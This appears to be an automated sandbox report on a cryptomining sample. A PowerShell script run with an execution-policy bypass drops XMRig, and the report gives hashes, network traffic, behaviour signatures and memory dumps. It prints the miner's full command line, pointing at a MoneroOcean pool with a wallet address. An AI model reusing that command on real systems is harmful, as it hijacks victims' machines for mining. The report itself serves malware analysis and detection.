| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/4384-1-0x00007FF95A543000-0x00007FF95A544000-memory.dmp
memory/4384-5-0x000001B453230000-0x000001B453252000-memory.dmp
memory/4384-6-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-9-0x000001B453500000-0x000001B453576000-memory.dmp
memory/4384-10-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w55l2h01.dbd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4384-25-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-48-0x000001B453580000-0x000001B453592000-memory.dmp
memory/4384-61-0x000001B4532E0000-0x000001B4532EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4128-90-0x000001A88A160000-0x000001A88A180000-memory.dmp
memory/4128-91-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-92-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4384-94-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-93-0x00007FF95A543000-0x00007FF95A544000-memory.dmp
memory/4384-95-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-96-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4128-97-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-98-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-99-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-100-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-101-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-102-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-103-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-104-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-105-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-106-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-107-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-108-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-109-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-110-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-111-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-112-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-113-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-114-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-115-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-116-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-117-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-118-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-119-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-120-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-121-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-122-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-123-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-124-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-125-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-126-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-127-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-128-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-129-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-130-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-131-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-132-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-133-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-134-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-135-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-136-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-137-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-138-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-139-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-140-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-141-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-142-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-143-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-144-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-145-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-146-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-147-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-148-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-149-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-150-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-151-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-152-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-153-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-154-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-155-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-156-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-157-0x00007FF642360000-0x00007FF642F93000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win11-20240611-en
Max time kernel
1796s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1648 wrote to memory of 3560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1648 wrote to memory of 3560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1648-0-0x00007FF9DDFD3000-0x00007FF9DDFD5000-memory.dmp
memory/1648-1-0x000001B03EC90000-0x000001B03ECB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_njkbfdil.ppm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1648-10-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-11-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-12-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-14-0x000001B057680000-0x000001B057692000-memory.dmp
memory/1648-15-0x000001B057210000-0x000001B05721A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3560-46-0x000001F5F7490000-0x000001F5F74B0000-memory.dmp
memory/3560-47-0x000001F5F77F0000-0x000001F5F7810000-memory.dmp
memory/3560-48-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-50-0x000001F5F8FF0000-0x000001F5F9010000-memory.dmp
memory/3560-49-0x000001F5F7810000-0x000001F5F7830000-memory.dmp
memory/3560-51-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/1648-52-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-53-0x00007FF9DDFD3000-0x00007FF9DDFD5000-memory.dmp
memory/3560-54-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-55-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-56-0x000001F5F7810000-0x000001F5F7830000-memory.dmp
memory/3560-57-0x000001F5F8FF0000-0x000001F5F9010000-memory.dmp
memory/3560-58-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-59-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-60-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-61-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-62-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-63-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-64-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-65-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-66-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-67-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-68-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-69-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-70-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-71-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-72-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-73-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-74-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-75-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-76-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-77-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-78-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-79-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-80-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-81-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-82-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-83-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-84-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-85-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-86-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-87-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-88-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-89-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-90-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-91-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-92-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-93-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-94-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-95-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-96-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-97-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-98-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-99-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-100-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-101-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-102-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-103-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-104-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-105-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-106-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-107-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-108-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-109-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-110-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-111-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-112-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-113-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-114-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-115-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-116-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:37
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 960 wrote to memory of 3192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 960 wrote to memory of 3192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3236,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=4224 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4980,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=756 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
Files
memory/960-0-0x00007FFC83AA3000-0x00007FFC83AA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3t3qzl5.0qf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/960-10-0x00000185F3AB0000-0x00000185F3AD2000-memory.dmp
memory/960-11-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/960-12-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/960-14-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/960-15-0x00000185F3C80000-0x00000185F3C92000-memory.dmp
memory/960-16-0x00000185F3C60000-0x00000185F3C6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3192-47-0x0000020F1EB10000-0x0000020F1EB30000-memory.dmp
memory/3192-48-0x0000020F20310000-0x0000020F20330000-memory.dmp
memory/3192-49-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/960-50-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/3192-52-0x0000020FB29C0000-0x0000020FB29E0000-memory.dmp
memory/3192-51-0x0000020FB2790000-0x0000020FB27B0000-memory.dmp
memory/960-54-0x00007FFC83AA3000-0x00007FFC83AA5000-memory.dmp
memory/3192-53-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-55-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/960-56-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/3192-59-0x0000020FB29C0000-0x0000020FB29E0000-memory.dmp
memory/3192-58-0x0000020FB2790000-0x0000020FB27B0000-memory.dmp
memory/3192-57-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-60-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-61-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-62-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-63-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-64-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-65-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-66-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-67-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-68-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
